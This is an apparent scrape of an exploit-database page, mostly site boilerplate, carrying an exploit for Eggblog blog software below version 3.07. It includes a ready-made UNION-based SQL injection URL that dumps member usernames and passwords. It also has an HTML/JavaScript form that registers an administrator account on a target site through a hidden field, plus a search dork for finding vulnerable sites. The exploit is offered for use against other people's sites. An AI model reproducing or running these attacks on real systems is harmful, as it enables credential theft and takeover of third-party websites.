0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Eggblog < 3.07 Remote (SQL Injection / Privilege Escalation) Exploit
==================================================================== Eggblog < 3.07 Remote (SQL Injection / Privilege Escalation) Exploit ==================================================================== <!-- Eggblog <= 3.x Multiple Remote Vulnerabilities Discovered by: nukedx Eggblog <= 3.0.6 (rss/posts.php id) Remote SQL injection Example -> http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/* This SQL injection will list you all users and passwords. --> <html> <title>Eggblog 2.x Remote Privilege Escalation</title> <body bgcolor="#000000"> <style> .xpl {font-family:tahoma; font-size:11px; text-decoration: none;} </style> <script language="JavaScript"> function egxpl() { if (document.xplt.victim.value=="") { alert("Please enter site!"); return false; } if (confirm("Are you sure?")) { xplt.action="http://"+document.xplt.victim.value+"home/register.php"; xplt.username.value=document.xplt.username.value; xplt.email.value=document.xplt.email.value; xplt.password.value=document.xplt.password.value; xplt.ref=document.xplt.ref.value; xplt.submit(); } } </script> <strong> <font class="xpl" color="#00FF40"> <pre> <center> Welcome to Eggblog 2.x Remote Privilege Escalation This exploit has been coded by nukedx You can found original advisory on http://www.nukedx.com/?viewdoc=36 Dork for this exploit: <u>inurl:"powered by eggblog"</u> Your target must be like that: www.victim.com/Path/ The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/ If the site has /eggblog/home in link your target must be www.victim.com/eggblog/ For second example your target must be www.victim.com/ You can login with your admin account via www.victim.com/eggblog/admin/index.php Have phun <form name="xplt" method="POST" onsubmit="egxpl();"> Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl"> <input type="text" name="username" value="Enter Username" class="xpl" size="30"> <input type="text" name="email" value="Enter Email" class="xpl" size="30"> <input type="text" name="password" value="Enter Password" class="xpl" size="30"> <input type="hidden" name="ref" value="T"> <input type="submit" value="Send" class="xpl"> </form> </pre> </font> </strong> </body> </html> # 0day.today [2024-12-24] #